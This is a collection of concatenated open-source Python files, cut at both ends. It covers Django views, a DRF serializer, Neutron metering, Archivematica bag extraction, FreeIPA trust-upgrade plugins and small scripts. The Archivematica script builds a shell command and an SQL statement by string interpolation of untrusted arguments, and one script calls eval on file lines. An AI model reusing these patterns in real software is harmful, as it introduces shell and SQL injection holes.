form = EditProfileForm(instance=request.user)
player_form = EditPlayerForm(instance=player)
return render(request, 'user/editprofile.html',
{'form': form, 'player_form': player_form})
@login_required
def editratings(request):
try:
ratings = PlayerRatings.objects.get(user=request.user, submitted_by=request.user, ratings_type=PlayerRatings.RATING_TYPE_USER)
except PlayerRatings.DoesNotExist:
ratings = None
if request.method == 'POST':
form = EditPlayerRatingsForm(request.POST, instance=ratings)
if form.is_valid():
instance = form.save(commit=False)
instance.ratings_type = PlayerRatings.RATING_TYPE_USER
instance.submitted_by = request.user
instance.updated = timezone.now()
instance.user = request.user
instance.save()
messages.success(request, 'Your ratings were updated successfully.')
return HttpResponseRedirect(reverse('editratings'))
else:
messages.error(request, 'There was an error on the form you submitted.')
else:
form = EditPlayerRatingsForm(instance=ratings)
return render(request, 'user/editratings.html',
{
'form': form
}
)
| rdonnelly/ultimate-league-app | src/ultimate/user/views.py | Python | bsd-3-clause | 4,712 |
import json
from django.core.urlresolvers import reverse
from rest_framework import serializers
import amo
from amo.helpers import absolutify
from files.models import FileUpload
class FileUploadSerializer(serializers.ModelSerializer):
active = serializers.SerializerMethodField('get_active')
url = serializers.SerializerMethodField('get_url')
files = serializers.SerializerMethodField('get_files')
passed_review = serializers.SerializerMethodField('get_passed_review')
pk = serializers.CharField()
processed = serializers.BooleanField(source='processed')
reviewed = serializers.SerializerMethodField('get_reviewed')
valid = serializers.BooleanField(source='passed_all_validations')
validation_results = serializers.SerializerMethodField(
'get_validation_results')
validation_url = serializers.SerializerMethodField('get_validation_url')
class Meta:
model = FileUpload
fields = [
'active',
'automated_signing',
'url',
'files',
'passed_review',
'pk',
'processed',
'reviewed',
'valid',
'validation_results',
'validation_url',
'version',
]
def __init__(self, *args, **kwargs):
self.version = kwargs.pop('version', None)
super(FileUploadSerializer, self).__init__(*args, **kwargs)
def get_url(self, instance):
return absolutify(reverse('signing.version', args=[instance.addon.guid,
instance.version,
instance.pk]))
def get_validation_url(self, instance):
return absolutify(reverse('devhub.upload_detail',
args=[instance.uuid]))
def get_files(self, instance):
if self.version is not None:
return [{'download_url': f.get_signed_url('api'),
'hash': f.hash,
'signed': f.is_signed}
for f in self.version.files.all()]
else:
return []
def get_validation_results(self, instance):
if instance.validation:
return json.loads(instance.validation)
else:
return None
def get_reviewed(self, instance):
if self.version is not None:
return all(file_.reviewed for file_ in self.version.all_files)
else:
return False
def get_active(self, instance):
if self.version is not None:
return all(file_.status in amo.REVIEWED_STATUSES
for file_ in self.version.all_files)
else:
return False
def get_passed_review(self, instance):
return self.get_reviewed(instance) and self.get_active(instance)
| mdaif/olympia | apps/signing/serializers.py | Python | bsd-3-clause | 2,866 |
# Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import oslo_messaging
from neutron.common import constants as consts
from neutron.common import utils
from neutron.i18n import _LE
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as service_constants
LOG = logging.getLogger(__name__)
class MeteringRpcCallbacks(object):
target = oslo_messaging.Target(version='1.0')
def __init__(self, meter_plugin):
self.meter_plugin = meter_plugin
def get_sync_data_metering(self, context, **kwargs):
l3_plugin = manager.NeutronManager.get_service_plugins().get(
service_constants.L3_ROUTER_NAT)
if not l3_plugin:
return
host = kwargs.get('host')
if not utils.is_extension_supported(
l3_plugin, consts.L3_AGENT_SCHEDULER_EXT_ALIAS) or not host:
return self.meter_plugin.get_sync_data_metering(context)
else:
agents = l3_plugin.get_l3_agents(context, filters={'host': [host]})
if not agents:
LOG.error(_LE('Unable to find agent %s.'), host)
return
routers = l3_plugin.list_routers_on_l3_agent(context, agents[0].id)
router_ids = [router['id'] for router in routers['routers']]
if not router_ids:
return
return self.meter_plugin.get_sync_data_metering(context,
router_ids=router_ids)
| cloudbase/neutron-virtualbox | neutron/db/metering/metering_rpc.py | Python | apache-2.0 | 2,091 |
#!/usr/bin/python -OO
# This file is part of Archivematica.
#
# Copyright 2010-2012 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
# @version svn: $Id$
import shutil
import os
import sys
sys.path.append("/usr/lib/archivematica/archivematicaCommon")
from executeOrRunSubProcess import executeOrRun
import databaseInterface
def extract(target, destinationDirectory):
command = """/usr/bin/7z x -bd -o"%s" "%s" """ % (destinationDirectory, target)
exitC, stdOut, stdErr = executeOrRun("command", command, printing=False)
if exitC != 0:
print stdOut
print >>sys.stderr, "Failed extraction: ", command, "\r\n", stdErr
exit(exitC)
if __name__ == '__main__':
target = sys.argv[1]
transferUUID = sys.argv[2]
processingDirectory = sys.argv[3]
sharedPath = sys.argv[4]
basename = os.path.basename(target)
basename = basename[:basename.rfind(".")]
destinationDirectory = os.path.join(processingDirectory, basename)
zipLocation = os.path.join(processingDirectory, os.path.basename(target))
#move to processing directory
shutil.move(target, zipLocation)
#extract
extract(zipLocation, destinationDirectory)
#checkForTopLevelBag
listdir = os.listdir(destinationDirectory)
if len(listdir) == 1:
internalBagName = listdir[0]
#print "ignoring BagIt internal name: ", internalBagName
temp = destinationDirectory + "-tmp"
shutil.move(destinationDirectory, temp)
#destinationDirectory = os.path.join(processingDirectory, internalBagName)
shutil.move(os.path.join(temp, internalBagName), destinationDirectory)
os.rmdir(temp)
#update transfer
destinationDirectoryDB = destinationDirectory.replace(sharedPath, "%sharedPath%", 1)
sql = """UPDATE Transfers SET currentLocation = '%s' WHERE transferUUID = '%s';""" % (destinationDirectoryDB, transferUUID)
databaseInterface.runSQL(sql)
#remove bag
os.remove(zipLocation)
| artefactual/archivematica-history | src/MCPClient/lib/clientScripts/extractBagTransfer.py | Python | agpl-3.0 | 2,795 |
from handlers import ViewHandler
from utility import validate
import json
import entities
# Handler for new comments
class NewCommentHandler(ViewHandler):
# This handler only accepts post requests and we make sure that post is
# valid and user is authenticated with the decorators and pass in the
# json parameter to the decorator to send json response in case of error
@ViewHandler.is_post_valid("json")
@ViewHandler.is_user_authenticated("json")
def post(self, post_id):
# Get the comment from the request
comment = self.request.get("comment")
params = {"comment": comment}
# Check if the comment is valid
comment_error = validate.is_valid_comment(comment)
if comment_error:
params["error"] = comment_error
self.response.write(json.dumps(params))
else:
# Create the comment object in the database
comment = (entities.Comments
.create(comment, self.user.username,
post_id))
# if comment was created then we return the relevant data in
# json format to the user otherwise we return an error
if comment:
params["success"] = "true"
params["username"] = comment.username
params["created"] = (comment.created
.strftime('%Y-%m-%d %H:%M:%S'))
params["comment_id"] = comment.key().id()
self.response.write(json.dumps(params))
else:
params["error"] = "Unknown error"
self.response.write(json.dumps(params))
| FatalTouch/BlogExample | handlers/comment/newcomment.py | Python | apache-2.0 | 1,683 |
with open('8.in') as f:
print(sum([len(line.strip()) - len(eval(line)) for line in f]))
| pedrotari7/advent_of_code | py/2015/8A.py | Python | mit | 94 |
from __future__ import division
import sys
import igraph
import numpy as np
import pandas as pd
from sklearn.cross_validation import train_test_split
from sklearn.ensemble import *
from sklearn.metrics import *
from sklearn.preprocessing import MinMaxScaler
from transform_funcs import *
from tradaboost import *
from utils import *
from scipy.sparse import coo_matrix, linalg
def graph_to_sparse_matrix(G):
n = G.vcount()
xs, ys = map(np.array, zip(*G.get_edgelist()))
if not G.is_directed():
xs, ys = np.hstack((xs, ys)).T, np.hstack((ys, xs)).T
else:
xs, ys = xs.T, ys.T
try:
weights = G.es["weights"]
except KeyError:
weights = np.ones(xs.shape)
A = coo_matrix((weights, (xs, ys)), shape=(n, n), dtype=np.int16)
return A.tocsr()
def get_feature(G, f):
return _transform_func_degree(getattr(G, f)()) if callable(getattr(G, f)) else _transform_func(getattr(G, f))
# aggregate by the mean value of feature of neighbours
def mean_neighbour(A, d, feature):
return A.dot(feature) / d
def get_feature_matrix(G, features, rounds=5):
# local clustering coefficient
lcc = np.array(G.transitivity_local_undirected(mode='zero'))
lcc[lcc < 0] = 0 # implementation of igraph is really shitty
G.clustering_coefficient = lcc
# compute PageRank
G_sim = G.copy()
G_sim = G_sim.simplify(multiple=False) # remove loops
alpha = 0.15
pagerank = np.array(G_sim.pagerank(damping=1-alpha))
G.pr = pagerank
feature_matrix = [ get_feature(G, f) for f in features ]
X = np.array(feature_matrix).T
# adjacency matrix (simplified, signs removed)
A = graph_to_sparse_matrix(G.as_undirected().simplify())
A = np.abs(A)
d = np.squeeze(np.array(A.sum(axis=1))).astype(np.int)
d[d == 0] = 1
for i in range(rounds):
feature_matrix = [ mean_neighbour(A, d, f) for f in feature_matrix ]
X = np.concatenate((X, np.array(feature_matrix).T), axis=1)
#X = np.hstack((X, np.array([pagerank]).T))
return X
# read a signed graph in file 'f_graph' and calculate its 'features'
# return its adjacency matrix A, size n, feature matrix X and eigen-trust vector v;
def read_signed_graph(f_graph, features):
# dataset (graph)
df = pd.read_csv(f_graph, sep=' ', header=None, skiprows=2)
nodes = np.unique(df[[0, 1]].values);
max_node_num = max(nodes) + 1
n = len(nodes)
G = igraph.Graph(directed=True)
G.add_vertices(max_node_num)
G.add_edges(df[[0, 1]].values)
# add signs (+/-)
G.es["weights"] = df[2].values
G = G.subgraph(nodes)
G = G.simplify(multiple=False) # remove loops
# get adjacency matrix
A = graph_to_sparse_matrix(G)
v = eigen_trust(A)
# features
X = get_feature_matrix(G, features)
return A, n, np.squeeze(X), v
def read_target_graph(f_graph, features):
# dataset (graph)
df = pd.read_csv(f_graph, sep=',', header=None)
nodes = np.unique(df[[0, 1]].values);
max_node_num = max(nodes) + 1
n = len(nodes)
G = igraph.Graph(directed=True)
G.add_vertices(max_node_num)
G.add_edges(df[[0, 1]].values)
G = G.subgraph(nodes)
G = G.simplify(multiple=False) # remove loops
# get adjacency matrix
A = graph_to_sparse_matrix(G)
v = eigen_trust(A)
# features
X = get_feature_matrix(G, features)
return A, n, np.squeeze(X), v
# main
def main(f_source_graph):
# params
f_target_graph = 'sag/sag-network'
f_target_roles = 'sag/sag-roles'
f_target_dict = 'sag/sag-dictionary'
n_trees = 200
features = [ 'clustering_coefficient' , 'degree' , 'indegree' , 'outdegree', 'pr' ]
# read datasets
A_s, n_s, X_s, v_s = read_signed_graph(f_source_graph, features)
A_t, n_t, X_t, v_t = read_target_graph(f_target_graph, features)
df_dict = pd.read_csv(f_target_dict, sep=' ')
df_roles_target = pd.read_csv(f_target_roles, header=None, sep=' ')
# get users with 'no_captcha' i.e. trusted users
r = df_roles_target.values
no_captcha = r[r[:,1]==5][:,0]
ids = df_dict['ent.string.name'].values # the user IDs in SAG system
y_t = np.array([ np.isin(x, no_captcha) for x in ids ]).flatten()
index_trusted_s = np.argsort(v_s)[::-1][0:500]
y_s = np.zeros(n_s)
y_s[index_trusted_s] = 1
# TraDaBoost
X_t1, X_t2, y_t1, y_t2 = train_test_split(X_t, y_t, test_size=0.33, random_state=4242)
v_pred = tradaboost(X_t1, X_s, y_t1, y_s, X_t2, 10)
print v_pred
auc = roc_auc_score(y_t2, v_pred)
print auc
#auc = roc_auc_score(y_t, v_t)
#print auc
if __name__ == '__main__':
# init
_transform_func_degree = no_transform
_transform_func = no_transform
if sys.argv[1] == 'epinions':
f_source_graph = 'epinions/out.epinions'
else: # 'slashdotzoo'
f_source_graph = 'slashdot-zoo/out.matrix'
main(f_source_graph)
| yfiua/TraNet | trust/trust-tradaboost.py | Python | gpl-3.0 | 5,064 |
# Copyright (C) 2012-2019 FreeIPA Contributors see COPYING for license
import logging
from collections import namedtuple
from textwrap import dedent
from ipalib import Registry, errors
from ipalib import Updater
from ipapython.dn import DN
from ipapython import ipautil
from ipaplatform.paths import paths
from ipaserver.install import service
from ipaserver.install import sysupgrade
from ipaserver.install.adtrustinstance import (
ADTRUSTInstance, map_Guests_to_nobody)
from ipaserver.dcerpc_common import TRUST_BIDIRECTIONAL
try:
from samba.ndr import ndr_unpack
from samba.dcerpc import lsa, drsblobs
except ImportError:
# If samba.ndr is not available, this machine is not provisioned
# for serving a trust to Active Directory. As result, it does
# not matter what ndr_unpack does but we save on pylint checks
def ndr_unpack(x):
raise NotImplementedError
drsblobs = None
logger = logging.getLogger(__name__)
register = Registry()
DEFAULT_ID_RANGE_SIZE = 200000
trust_read_keys_template = \
["cn=adtrust agents,cn=sysaccounts,cn=etc,{basedn}",
"cn=trust admins,cn=groups,cn=accounts,{basedn}"]
@register()
class update_default_range(Updater):
"""
Create default ID range for upgraded servers.
"""
def execute(self, **options):
ldap = self.api.Backend.ldap2
dn = DN(self.api.env.container_ranges, self.api.env.basedn)
search_filter = "objectclass=ipaDomainIDRange"
try:
ldap.find_entries(search_filter, [], dn)
except errors.NotFound:
pass
else:
logger.debug("default_range: ipaDomainIDRange entry found, skip "
"plugin")
return False, []
dn = DN(('cn', 'admins'), self.api.env.container_group,
self.api.env.basedn)
try:
admins_entry = ldap.get_entry(dn, ['gidnumber'])
except errors.NotFound:
logger.error("default_range: No local ID range and no admins "
"group found. Cannot create default ID range")
return False, []
id_range_base_id = admins_entry['gidnumber'][0]
id_range_name = '%s_id_range' % self.api.env.realm
id_range_size = DEFAULT_ID_RANGE_SIZE
range_entry = [
dict(attr='objectclass', value='top'),
dict(attr='objectclass', value='ipaIDrange'),
dict(attr='objectclass', value='ipaDomainIDRange'),
dict(attr='cn', value=id_range_name),
dict(attr='ipabaseid', value=id_range_base_id),
dict(attr='ipaidrangesize', value=id_range_size),
dict(attr='iparangetype', value='ipa-local'),
]
dn = DN(('cn', '%s_id_range' % self.api.env.realm),
self.api.env.container_ranges, self.api.env.basedn)
update = {'dn': dn, 'default': range_entry}
# Default range entry has a hard-coded range size to 200000 which is
# a default range size in ipa-server-install. This could cause issues
# if user did not use a default range, but rather defined an own,
# bigger range (option --idmax).
# We should make our best to check if this is the case and provide
# user with an information how to fix it.
dn = DN(self.api.env.container_dna_posix_ids, self.api.env.basedn)
search_filter = "objectclass=dnaSharedConfig"
attrs = ['dnaHostname', 'dnaRemainingValues']
try:
(entries, _truncated) = ldap.find_entries(search_filter, attrs, dn)
except errors.NotFound:
logger.warning("default_range: no dnaSharedConfig object found. "
"Cannot check default range size.")
else:
masters = set()
remaining_values_sum = 0
for entry in entries:
hostname = entry.get('dnahostname', [None])[0]
if hostname is None or hostname in masters:
continue
remaining_values = entry.get('dnaremainingvalues', [''])[0]
try:
remaining_values = int(remaining_values)
except ValueError:
logger.warning("default_range: could not parse "
"remaining values from '%s'",
remaining_values)
continue
else:
remaining_values_sum += remaining_values
masters.add(hostname)
if remaining_values_sum > DEFAULT_ID_RANGE_SIZE:
msg = ['could not verify default ID range size',
'Please use the following command to set correct ID range size',
' $ ipa range-mod %s --range-size=RANGE_SIZE' % id_range_name,
'RANGE_SIZE may be computed from --idstart and --idmax options '
'used during IPA server installation:',
' RANGE_SIZE = (--idmax) - (--idstart) + 1'
]
logger.error("default_range: %s", "\n".join(msg))
return False, [update]
@register()
class update_default_trust_view(Updater):
"""
Create Default Trust View for upgraded servers.
"""
def execute(self, **options):
ldap = self.api.Backend.ldap2
default_trust_view_dn = DN(('cn', 'Default Trust View'),
self.api.env.container_views,
self.api.env.basedn)
default_trust_view_entry = [
dict(attr='objectclass', value='top'),
dict(attr='objectclass', value='ipaIDView'),
dict(attr='cn', value='Default Trust View'),
dict(attr='description', value='Default Trust View for AD users. '
'Should not be deleted.'),
]
# First, see if trusts are enabled on the server
if not self.api.Command.adtrust_is_enabled()['result']:
logger.debug('AD Trusts are not enabled on this server')
return False, []
# Second, make sure the Default Trust View does not exist yet
try:
ldap.get_entry(default_trust_view_dn)
except errors.NotFound:
pass
else:
logger.debug('Default Trust View already present on this server')
return False, []
# We have a server with AD trust support without Default Trust View.
# Create the Default Trust View entry.
update = {
'dn': default_trust_view_dn,
'default': default_trust_view_entry
}
return False, [update]
@register()
class update_sigden_extdom_broken_config(Updater):
"""Fix configuration of sidgen and extdom plugins
Upgrade to IPA 4.2+ cause that sidgen and extdom plugins have improperly
configured basedn.
All trusts which have been added when config was broken must to be
re-added manually.
https://fedorahosted.org/freeipa/ticket/5665
"""
sidgen_config_dn = DN("cn=IPA SIDGEN,cn=plugins,cn=config")
extdom_config_dn = DN("cn=ipa_extdom_extop,cn=plugins,cn=config")
def _fix_config(self):
"""Due upgrade error configuration of sidgen and extdom plugins may
contain literally "$SUFFIX" value instead of real DN in nsslapd-basedn
attribute
:return: True if config was fixed, False if fix is not needed
"""
ldap = self.api.Backend.ldap2
basedn_attr = 'nsslapd-basedn'
modified = False
for dn in (self.sidgen_config_dn, self.extdom_config_dn):
try:
entry = ldap.get_entry(dn, attrs_list=[basedn_attr])
except errors.NotFound:
logger.debug("configuration for %s not found, skipping", dn)
else:
configured_suffix = entry.single_value.get(basedn_attr)
if configured_suffix is None:
raise RuntimeError(
"Missing attribute {attr} in {dn}".format(
attr=basedn_attr, dn=dn
)
)
elif configured_suffix == "$SUFFIX":
# configured value is wrong, fix it
entry.single_value[basedn_attr] = str(self.api.env.basedn)
logger.debug("updating attribute %s of %s to correct "
"value %s",
basedn_attr, dn, self.api.env.basedn)
ldap.update_entry(entry)
modified = True
else:
logger.debug("configured basedn for %s is okay", dn)
return modified
def execute(self, **options):
if sysupgrade.get_upgrade_state('sidgen', 'config_basedn_updated'):
logger.debug("Already done, skipping")
return False, ()
restart = False
if self._fix_config():
sysupgrade.set_upgrade_state('sidgen', 'update_sids', True)
restart = True # DS has to be restarted to apply changes
sysupgrade.set_upgrade_state('sidgen', 'config_basedn_updated', True)
return restart, ()
@register()
class update_sids(Updater):
"""SIDs may be not created properly if bug with wrong configuration for
sidgen and extdom plugins is effective
This must be run after "update_sigden_extdom_broken_config"
https://fedorahosted.org/freeipa/ticket/5665
"""
sidgen_config_dn = DN("cn=IPA SIDGEN,cn=plugins,cn=config")
def execute(self, **options):
ldap = self.api.Backend.ldap2
if sysupgrade.get_upgrade_state('sidgen', 'update_sids') is not True:
logger.debug("SIDs do not need to be generated")
return False, ()
# check if IPA domain for AD trust has been created, and if we need to
# regenerate missing SIDs if attribute 'ipaNTSecurityIdentifier'
domain_IPA_AD_dn = DN(
('cn', self.api.env.domain),
self.api.env.container_cifsdomains,
self.api.env.basedn)
attr_name = 'ipaNTSecurityIdentifier'
try:
entry = ldap.get_entry(domain_IPA_AD_dn, attrs_list=[attr_name])
except errors.NotFound:
logger.debug("IPA domain object %s is not configured",
domain_IPA_AD_dn)
sysupgrade.set_upgrade_state('sidgen', 'update_sids', False)
return False, ()
else:
if not entry.single_value.get(attr_name):
# we need to run sidgen task
sidgen_task_dn = DN(
"cn=generate domain sid,cn=ipa-sidgen-task,cn=tasks,"
"cn=config")
sidgen_tasks_attr = {
"objectclass": ["top", "extensibleObject"],
"cn": ["sidgen"],
"delay": [0],
"nsslapd-basedn": [self.api.env.basedn],
}
task_entry = ldap.make_entry(sidgen_task_dn,
**sidgen_tasks_attr)
try:
ldap.add_entry(task_entry)
except errors.DuplicateEntry:
logger.debug("sidgen task already created")
else:
logger.debug("sidgen task has been created")
# we have to check all trusts domains which may been affected by the
# bug. Symptom is missing 'ipaNTSecurityIdentifier' attribute
base_dn = DN(self.api.env.container_adtrusts, self.api.env.basedn)
try:
trust_domain_entries, truncated = ldap.find_entries(
base_dn=base_dn,
scope=ldap.SCOPE_ONELEVEL,
attrs_list=["cn"],
# more types of trusts can be stored under cn=trusts, we need
# the type with ipaNTTrustPartner attribute
filter="(&(ipaNTTrustPartner=*)(!(%s=*)))" % attr_name
)
except errors.NotFound:
pass
else:
if truncated:
logger.warning("update_sids: Search results were truncated")
for entry in trust_domain_entries:
domain = entry.single_value["cn"]
logger.error(
"Your trust to %s is broken. Please re-create it by "
"running 'ipa trust-add' again.", domain)
sysupgrade.set_upgrade_state('sidgen', 'update_sids', False)
return False, ()
def get_gidNumber(ldap, env):
# Read the gidnumber of the fallback group and returns a list with it
dn = DN(('cn', ADTRUSTInstance.FALLBACK_GROUP_NAME),
env.container_group,
env.basedn)
try:
entry = ldap.get_entry(dn, ['gidnumber'])
gidNumber = entry.get('gidnumber')
except errors.NotFound:
logger.error("%s not found",
ADTRUSTInstance.FALLBACK_GROUP_NAME)
return None
if gidNumber is None:
logger.error("%s does not have a gidnumber",
ADTRUSTInstance.FALLBACK_GROUP_NAME)
return None
return gidNumber
@register()
class update_tdo_gidnumber(Updater):
"""
Create a gidNumber attribute for Trusted Domain Objects.
The value is taken from the fallback group defined in cn=Default SMB Group.
"""
def execute(self, **options):
ldap = self.api.Backend.ldap2
# First, see if trusts are enabled on the server
if not self.api.Command.adtrust_is_enabled()['result']:
logger.debug('AD Trusts are not enabled on this server')
return False, []
gidNumber = get_gidNumber(ldap, self.api.env)
if not gidNumber:
logger.error("%s does not have a gidnumber",
ADTRUSTInstance.FALLBACK_GROUP_NAME)
return False, ()
# For each trusted domain object, add posix attributes
# to allow use of a trusted domain account by AD DCs
# to authenticate against our Samba instance
try:
tdos = ldap.get_entries(
DN(self.api.env.container_adtrusts, self.api.env.basedn),
scope=ldap.SCOPE_ONELEVEL,
filter="(&(objectclass=ipaNTTrustedDomain)"
"(objectclass=ipaIDObject))",
attrs_list=['gidnumber', 'uidnumber', 'objectclass',
'ipantsecurityidentifier',
'ipaNTTrustDirection'
'uid', 'cn', 'ipantflatname'])
for tdo in tdos:
# if the trusted domain object does not contain gidnumber,
# add the default fallback group gidnumber
if not tdo.get('gidnumber'):
tdo['gidnumber'] = gidNumber
# Generate uidNumber and ipaNTSecurityIdentifier if
# uidNumber is missing. We rely on sidgen plugin here
# to generate ipaNTSecurityIdentifier.
if not tdo.get('uidnumber'):
tdo['uidnumber'] = ['-1']
if 'posixAccount' not in tdo.get('objectclass'):
tdo['objectclass'].extend(['posixAccount'])
# Based on the flat name of a TDO,
# add user name FLATNAME$ (note dollar sign)
# to allow SSSD to map this TDO to a POSIX account
if not tdo.get('uid'):
tdo['uid'] = ["{flatname}$".format(
flatname=tdo.single_value['ipantflatname'])]
if not tdo.get('homedirectory'):
tdo['homedirectory'] = ['/dev/null']
# Store resulted entry
try:
ldap.update_entry(tdo)
except errors.ExecutionError as e:
logger.warning(
"Failed to update trusted domain object %s", tdo.dn)
logger.debug("Exception during TDO update: %s", str(e))
except errors.NotFound:
logger.debug("No trusted domain object to update")
return False, ()
return False, ()
@register()
class update_mapping_Guests_to_nobody(Updater):
"""
Map BUILTIN\\Guests group to nobody
Samba 4.9 became more strict on availability of builtin Guests group
"""
def execute(self, **options):
# First, see if trusts are enabled on the server
if not self.api.Command.adtrust_is_enabled()['result']:
logger.debug('AD Trusts are not enabled on this server')
return False, []
map_Guests_to_nobody()
return False, []
@register()
class update_tdo_to_new_layout(Updater):
"""
Transform trusted domain objects into a new layout
There are now two Kerberos principals per direction of trust:
INBOUND:
- krbtgt/<OUR REALM>@<REMOTE REALM>, enabled by default
- <OUR FLATNAME$>@<REMOTE REALM>, disabled by default on our side
as it is only used by SSSD to retrieve TDO creds when operating
as an AD Trust agent across IPA topology
OUTBOUND:
- krbtgt/<REMOTE REALM>@<OUR REALM>, enabled by default
- <REMOTE FLATNAME$>@<OUR REALM>, enabled by default and
used by remote trusted DCs to authenticate against us
This principal also has krbtgt/<REMOTE FLATNAME>@<OUR REALM> defined
as a Kerberos principal alias. This is due to how Kerberos
key salt is derived for cross-realm principals on AD side
Finally, Samba requires <REMOTE FLATNAME$> account to also possess POSIX
and SMB identities. We ensure this by making the trusted domain object to
be this account with 'uid' and 'cn' attributes being '<REMOTE FLATNAME$>'
and uidNumber/gidNumber generated automatically. Also, we ensure the
trusted domain object is given a SID.
The update to <REMOTE FLATNAME$> POSIX/SMB identities is done through
the update plugin update_tdo_gidnumber.
"""
tgt_principal_template = "krbtgt/{remote}@{local}"
nbt_principal_template = "{nbt}$@{realm}"
trust_filter = \
"(&(objectClass=ipaNTTrustedDomain)(objectClass=ipaIDObject))"
trust_attrs = ("ipaNTFlatName", "ipaNTTrustPartner", "ipaNTTrustDirection",
"cn", "ipaNTTrustAttributes", "ipaNTAdditionalSuffixes",
"ipaNTTrustedDomainSID", "ipaNTTrustType",
"ipaNTTrustAuthIncoming", "ipaNTTrustAuthOutgoing")
change_password_template = \
"change_password -pw {password} " \
"-e aes256-cts-hmac-sha1-96,aes128-cts-hmac-sha1-96 " \
"{principal}"
KRB_PRINC_CREATE_DEFAULT = 0x00000000
KRB_PRINC_CREATE_DISABLED = 0x00000001
KRB_PRINC_CREATE_AGENT_PERMISSION = 0x00000002
KRB_PRINC_CREATE_IDENTITY = 0x00000004
KRB_PRINC_MUST_EXIST = 0x00000008
# This is a flag for krbTicketFlags attribute
# to disallow creating any tickets using this principal
KRB_DISALLOW_ALL_TIX = 0x00000040
def retrieve_trust_password(self, packed):
# The structure of the trust secret is described at
# https://github.com/samba-team/samba/blob/master/
# librpc/idl/drsblobs.idl#L516-L569
# In our case in LDAP TDO object stores
# `struct trustAuthInOutBlob` that has `count` and
# the `current` of `AuthenticationInformationArray` struct
# which has own `count` and `array` of `AuthenticationInformation`
# structs that have `AuthType` field which should be equal to
# `LSA_TRUST_AUTH_TYPE_CLEAR`.
# Then AuthInfo field would contain a password as an array of bytes
assert(packed.count != 0)
assert(packed.current.count != 0)
assert(packed.current.array[0].AuthType == lsa.TRUST_AUTH_TYPE_CLEAR)
clear_value = packed.current.array[0].AuthInfo.password
return ''.join(map(chr, clear_value))
def set_krb_principal(self, principals, password, trustdn, flags=None):
ldap = self.api.Backend.ldap2
if isinstance(principals, (list, tuple)):
trust_principal = principals[0]
alias = principals[1]
else:
trust_principal = principals
alias = None
entry = None
en = None
try:
entry = ldap.get_entry(
DN(('krbprincipalname', trust_principal), trustdn))
dn = entry.dn
action = ldap.update_entry
ticket_flags = int(entry.single_value.get('krbticketflags', 0))
logger.debug("Updating Kerberos principal entry for %s",
trust_principal)
except errors.NotFound:
# For a principal that must exist, we re-raise the exception
# to let the caller to handle this situation
if flags & self.KRB_PRINC_MUST_EXIST:
raise
ticket_flags = 0
if alias:
try:
en = ldap.get_entry(
DN(('krbprincipalname', alias), trustdn))
ldap.delete_entry(en.dn)
ticket_flags = int(en.single_value.get(
'krbticketflags', 0))
except errors.NotFound:
logger.debug("Entry for alias TDO does not exist for "
"trusted domain object %s, skip it",
alias)
dn = DN(('krbprincipalname', trust_principal), trustdn)
entry = ldap.make_entry(dn)
logger.debug("Adding Kerberos principal entry for %s",
trust_principal)
action = ldap.add_entry
entry_data = {
'objectclass':
['krbPrincipal', 'krbPrincipalAux',
'krbTicketPolicyAux', 'top'],
'krbcanonicalname': [trust_principal],
'krbprincipalname': [trust_principal],
}
if flags & self.KRB_PRINC_CREATE_DISABLED:
entry_data['krbticketflags'] = (ticket_flags |
self.KRB_DISALLOW_ALL_TIX)
if flags & self.KRB_PRINC_CREATE_AGENT_PERMISSION:
entry_data['objectclass'].extend(['ipaAllowedOperations'])
if alias:
entry_data['krbprincipalname'].extend([alias])
if en:
entry_data['krbprincipalkey'] = en.single_value.get(
'krbprincipalkey')
entry_data['krbextradata'] = en.single_value.get(
'krbextradata')
read_keys = en.get('ipaAllowedToPerform;read_keys', [])
if not read_keys:
# Old style, no ipaAllowedToPerform;read_keys in the entry,
# use defaults that ipasam should have set when creating a
# trust
read_keys = list(map(
lambda x: x.format(basedn=self.api.env.basedn),
trust_read_keys_template))
entry_data['ipaAllowedToPerform;read_keys'] = read_keys
entry.update(entry_data)
try:
action(entry)
except errors.EmptyModlist:
logger.debug("No update was required for Kerberos principal %s",
trust_principal)
# If entry existed, no need to set Kerberos keys on it
if action == ldap.update_entry:
logger.debug("No need to update Kerberos keys for "
"existing Kerberos principal %s",
trust_principal)
return
# Now that entry is updated, set its Kerberos keys.
#
# It would be a complication to use ipa-getkeytab LDAP extended control
# here because we would need to encode the request in ASN.1 sequence
# and we don't have the code to do so exposed in Python bindings.
# Instead, as we run on IPA master, we can use kadmin.local for that
# directly.
# We pass the command as a stdin to both avoid shell interpolation
# of the passwords and also to avoid its exposure to other processes
# Since we don't want to record the output, make also a redacted log
change_password = self.change_password_template.format(
password=password,
principal=trust_principal)
redacted = self.change_password_template.format(
password='<REDACTED OUT>',
principal=trust_principal)
logger.debug("Updating Kerberos keys for %s with the following "
"kadmin command:\n\t%s", trust_principal, redacted)
ipautil.run([paths.KADMIN_LOCAL, "-x",
"ipa-setup-override-restrictions"],
stdin=change_password, skip_output=True)
def execute(self, **options):
# First, see if trusts are enabled on the server
if not self.api.Command.adtrust_is_enabled()['result']:
logger.debug('AD Trusts are not enabled on this server')
return False, []
# If we have no Samba bindings, this master is not a trust controller
if drsblobs is None:
return False, []
ldap = self.api.Backend.ldap2
gidNumber = get_gidNumber(ldap, self.api.env)
if gidNumber is None:
return False, []
result = self.api.Command.trustconfig_show()['result']
our_nbt_name = result.get('ipantflatname', [None])[0]
if not our_nbt_name:
return False, []
trusts_dn = self.api.env.container_adtrusts + self.api.env.basedn
# We might be in a situation when no trusts exist yet
# In such case there is nothing to upgrade but we have to catch
